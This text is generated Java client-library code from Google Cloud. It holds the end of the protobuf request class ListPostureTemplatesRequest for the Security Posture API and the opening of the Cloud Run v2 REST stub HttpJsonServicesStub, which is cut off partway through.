(.google.api.resource_reference) = { ... } * </code> * * @return The bytes for parent. */ @java.lang.Override public com.google.protobuf.ByteString getParentBytes() { java.lang.Object ref = parent_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); parent_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int PAGE_SIZE_FIELD_NUMBER = 2; private int pageSize_ = 0; /** * * * <pre> * Optional. Requested page size. Server may return fewer items than * requested. If unspecified, server will pick an appropriate default. * </pre> * * <code>int32 page_size = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The pageSize. */ @java.lang.Override public int getPageSize() { return pageSize_; } public static final int PAGE_TOKEN_FIELD_NUMBER = 3; @SuppressWarnings("serial") private volatile java.lang.Object pageToken_ = ""; /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The pageToken. */ @java.lang.Override public java.lang.String getPageToken() { java.lang.Object ref = pageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); pageToken_ = s; return s; } } /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for pageToken. */ @java.lang.Override public com.google.protobuf.ByteString getPageTokenBytes() { java.lang.Object ref = pageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); pageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int FILTER_FIELD_NUMBER = 4; @SuppressWarnings("serial") private volatile java.lang.Object filter_ = ""; /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The filter. */ @java.lang.Override public java.lang.String getFilter() { java.lang.Object ref = filter_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); filter_ = s; return s; } } /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for filter. */ @java.lang.Override public com.google.protobuf.ByteString getFilterBytes() { java.lang.Object ref = filter_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); filter_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(parent_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, parent_); } if (pageSize_ != 0) { output.writeInt32(2, pageSize_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(pageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 3, pageToken_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(filter_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 4, filter_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(parent_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, parent_); } if (pageSize_ != 0) { size += com.google.protobuf.CodedOutputStream.computeInt32Size(2, pageSize_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(pageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, pageToken_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(filter_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(4, filter_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.securityposture.v1.ListPostureTemplatesRequest)) { return super.equals(obj); } com.google.cloud.securityposture.v1.ListPostureTemplatesRequest other = (com.google.cloud.securityposture.v1.ListPostureTemplatesRequest) obj; if (!getParent().equals(other.getParent())) return false; if (getPageSize() != other.getPageSize()) return false; if (!getPageToken().equals(other.getPageToken())) return false; if (!getFilter().equals(other.getFilter())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + PARENT_FIELD_NUMBER; hash = (53 * hash) + getParent().hashCode(); hash = (37 * hash) + PAGE_SIZE_FIELD_NUMBER; hash = (53 * hash) + getPageSize(); hash = (37 * hash) + PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getPageToken().hashCode(); hash = (37 * hash) + FILTER_FIELD_NUMBER; hash = (53 * hash) + getFilter().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.securityposture.v1.ListPostureTemplatesRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Message for requesting list of Posture Templates. * </pre> * * Protobuf type {@code google.cloud.securityposture.v1.ListPostureTemplatesRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.securityposture.v1.ListPostureTemplatesRequest) com.google.cloud.securityposture.v1.ListPostureTemplatesRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.securityposture.v1.V1mainProto .internal_static_google_cloud_securityposture_v1_ListPostureTemplatesRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.securityposture.v1.V1mainProto .internal_static_google_cloud_securityposture_v1_ListPostureTemplatesRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.class, com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.Builder.class); } // Construct using com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; parent_ = ""; pageSize_ = 0; pageToken_ = ""; filter_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.securityposture.v1.V1mainProto .internal_static_google_cloud_securityposture_v1_ListPostureTemplatesRequest_descriptor; } @java.lang.Override public com.google.cloud.securityposture.v1.ListPostureTemplatesRequest getDefaultInstanceForType() { return com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.getDefaultInstance(); } @java.lang.Override public com.google.cloud.securityposture.v1.ListPostureTemplatesRequest build() { com.google.cloud.securityposture.v1.ListPostureTemplatesRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.securityposture.v1.ListPostureTemplatesRequest buildPartial() { com.google.cloud.securityposture.v1.ListPostureTemplatesRequest result = new com.google.cloud.securityposture.v1.ListPostureTemplatesRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.securityposture.v1.ListPostureTemplatesRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.parent_ = parent_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.pageSize_ = pageSize_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.pageToken_ = pageToken_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.filter_ = filter_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.securityposture.v1.ListPostureTemplatesRequest) { return mergeFrom((com.google.cloud.securityposture.v1.ListPostureTemplatesRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.securityposture.v1.ListPostureTemplatesRequest other) { if (other == com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.getDefaultInstance()) return this; if (!other.getParent().isEmpty()) { parent_ = other.parent_; bitField0_ |= 0x00000001; onChanged(); } if (other.getPageSize() != 0) { setPageSize(other.getPageSize()); } if (!other.getPageToken().isEmpty()) { pageToken_ = other.pageToken_; bitField0_ |= 0x00000004; onChanged(); } if (!other.getFilter().isEmpty()) { filter_ = other.filter_; bitField0_ |= 0x00000008; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { parent_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 16: { pageSize_ = input.readInt32(); bitField0_ |= 0x00000002; break; } // case 16 case 26: { pageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000004; break; } // case 26 case 34: { filter_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000008; break; } // case 34 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object parent_ = ""; /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The parent. */ public java.lang.String getParent() { java.lang.Object ref = parent_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); parent_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for parent. */ public com.google.protobuf.ByteString getParentBytes() { java.lang.Object ref = parent_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); parent_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The parent to set. * @return This builder for chaining. */ public Builder setParent(java.lang.String value) { if (value == null) { throw new NullPointerException(); } parent_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearParent() { parent_ = getDefaultInstance().getParent(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for parent to set. * @return This builder for chaining. */ public Builder setParentBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); parent_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private int pageSize_; /** * * * <pre> * Optional. Requested page size. Server may return fewer items than * requested. If unspecified, server will pick an appropriate default. * </pre> * * <code>int32 page_size = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The pageSize. */ @java.lang.Override public int getPageSize() { return pageSize_; } /** * * * <pre> * Optional. Requested page size. Server may return fewer items than * requested. If unspecified, server will pick an appropriate default. * </pre> * * <code>int32 page_size = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The pageSize to set. * @return This builder for chaining. */ public Builder setPageSize(int value) { pageSize_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Optional. Requested page size. Server may return fewer items than * requested. If unspecified, server will pick an appropriate default. * </pre> * * <code>int32 page_size = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearPageSize() { bitField0_ = (bitField0_ & ~0x00000002); pageSize_ = 0; onChanged(); return this; } private java.lang.Object pageToken_ = ""; /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The pageToken. */ public java.lang.String getPageToken() { java.lang.Object ref = pageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); pageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for pageToken. */ public com.google.protobuf.ByteString getPageTokenBytes() { java.lang.Object ref = pageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); pageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The pageToken to set. * @return This builder for chaining. */ public Builder setPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } pageToken_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearPageToken() { pageToken_ = getDefaultInstance().getPageToken(); bitField0_ = (bitField0_ & ~0x00000004); onChanged(); return this; } /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The bytes for pageToken to set. * @return This builder for chaining. */ public Builder setPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); pageToken_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } private java.lang.Object filter_ = ""; /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The filter. */ public java.lang.String getFilter() { java.lang.Object ref = filter_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); filter_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for filter. */ public com.google.protobuf.ByteString getFilterBytes() { java.lang.Object ref = filter_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); filter_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The filter to set. * @return This builder for chaining. */ public Builder setFilter(java.lang.String value) { if (value == null) { throw new NullPointerException(); } filter_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearFilter() { filter_ = getDefaultInstance().getFilter(); bitField0_ = (bitField0_ & ~0x00000008); onChanged(); return this; } /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The bytes for filter to set. * @return This builder for chaining. */ public Builder setFilterBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); filter_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.securityposture.v1.ListPostureTemplatesRequest) } // @@protoc_insertion_point(class_scope:google.cloud.securityposture.v1.ListPostureTemplatesRequest) private static final com.google.cloud.securityposture.v1.ListPostureTemplatesRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.securityposture.v1.ListPostureTemplatesRequest(); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListPostureTemplatesRequest> PARSER = new com.google.protobuf.AbstractParser<ListPostureTemplatesRequest>() { @java.lang.Override public ListPostureTemplatesRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListPostureTemplatesRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListPostureTemplatesRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.securityposture.v1.ListPostureTemplatesRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
36,027
java-run/google-cloud-run/src/main/java/com/google/cloud/run/v2/stub/HttpJsonServicesStub.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.cloud.run.v2.stub; import static com.google.cloud.run.v2.ServicesClient.ListServicesPagedResponse; import com.google.api.HttpRule; import com.google.api.core.InternalApi; import com.google.api.gax.core.BackgroundResource; import com.google.api.gax.core.BackgroundResourceAggregation; import com.google.api.gax.httpjson.ApiMethodDescriptor; import com.google.api.gax.httpjson.HttpJsonCallSettings; import com.google.api.gax.httpjson.HttpJsonOperationSnapshot; import com.google.api.gax.httpjson.HttpJsonStubCallableFactory; import com.google.api.gax.httpjson.ProtoMessageRequestFormatter; import com.google.api.gax.httpjson.ProtoMessageResponseParser; import com.google.api.gax.httpjson.ProtoRestSerializer; import com.google.api.gax.httpjson.longrunning.stub.HttpJsonOperationsStub; import com.google.api.gax.rpc.ClientContext; import com.google.api.gax.rpc.OperationCallable; import com.google.api.gax.rpc.RequestParamsBuilder; import com.google.api.gax.rpc.UnaryCallable; import com.google.api.pathtemplate.PathTemplate; import com.google.cloud.run.v2.CreateServiceRequest; import com.google.cloud.run.v2.DeleteServiceRequest; import com.google.cloud.run.v2.GetServiceRequest; import com.google.cloud.run.v2.ListServicesRequest; import com.google.cloud.run.v2.ListServicesResponse; import com.google.cloud.run.v2.Service; import com.google.cloud.run.v2.UpdateServiceRequest; import com.google.common.collect.ImmutableMap; import com.google.iam.v1.GetIamPolicyRequest; import com.google.iam.v1.Policy; import com.google.iam.v1.SetIamPolicyRequest; import com.google.iam.v1.TestIamPermissionsRequest; import com.google.iam.v1.TestIamPermissionsResponse; import com.google.longrunning.Operation; import com.google.protobuf.TypeRegistry; import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.concurrent.TimeUnit; import javax.annotation.Generated; // AUTO-GENERATED DOCUMENTATION AND CLASS. /** * REST stub implementation for the Services service API. * * <p>This class is for advanced usage and reflects the underlying API directly. */ @Generated("by gapic-generator-java") public class HttpJsonServicesStub extends ServicesStub { private static final TypeRegistry typeRegistry = TypeRegistry.newBuilder().add(Service.getDescriptor()).build(); private static final ApiMethodDescriptor<CreateServiceRequest, Operation> createServiceMethodDescriptor = ApiMethodDescriptor.<CreateServiceRequest, Operation>newBuilder() .setFullMethodName("google.cloud.run.v2.Services/CreateService") .setHttpMethod("POST") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<CreateServiceRequest>newBuilder() .setPath( "/v2/{parent=projects/*/locations/*}/services", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<CreateServiceRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "parent", request.getParent()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<CreateServiceRequest> serializer = ProtoRestSerializer.create(); serializer.putQueryParam(fields, "serviceId", request.getServiceId()); serializer.putQueryParam( fields, "validateOnly", request.getValidateOnly()); serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int"); return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody("service", request.getService(), true)) .build()) .setResponseParser( ProtoMessageResponseParser.<Operation>newBuilder() .setDefaultInstance(Operation.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .setOperationSnapshotFactory( (CreateServiceRequest request, Operation response) -> HttpJsonOperationSnapshot.create(response)) .build(); private static final ApiMethodDescriptor<GetServiceRequest, Service> getServiceMethodDescriptor = ApiMethodDescriptor.<GetServiceRequest, Service>newBuilder() .setFullMethodName("google.cloud.run.v2.Services/GetService") .setHttpMethod("GET") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<GetServiceRequest>newBuilder() .setPath( "/v2/{name=projects/*/locations/*/services/*}", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<GetServiceRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "name", request.getName()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<GetServiceRequest> serializer = ProtoRestSerializer.create(); serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int"); return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( ProtoMessageResponseParser.<Service>newBuilder() .setDefaultInstance(Service.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<ListServicesRequest, ListServicesResponse> listServicesMethodDescriptor = ApiMethodDescriptor.<ListServicesRequest, ListServicesResponse>newBuilder() .setFullMethodName("google.cloud.run.v2.Services/ListServices") .setHttpMethod("GET") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<ListServicesRequest>newBuilder() .setPath( "/v2/{parent=projects/*/locations/*}/services", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<ListServicesRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "parent", request.getParent()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<ListServicesRequest> serializer = ProtoRestSerializer.create(); serializer.putQueryParam(fields, "pageSize", request.getPageSize()); serializer.putQueryParam(fields, "pageToken", request.getPageToken()); serializer.putQueryParam( fields, "showDeleted", request.getShowDeleted()); serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int"); return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( ProtoMessageResponseParser.<ListServicesResponse>newBuilder() .setDefaultInstance(ListServicesResponse.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<UpdateServiceRequest, Operation> updateServiceMethodDescriptor = ApiMethodDescriptor.<UpdateServiceRequest, Operation>newBuilder() .setFullMethodName("google.cloud.run.v2.Services/UpdateService") .setHttpMethod("PATCH") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<UpdateServiceRequest>newBuilder() .setPath( "/v2/{service.name=projects/*/locations/*/services/*}", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<UpdateServiceRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam( fields, "service.name", request.getService().getName()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new 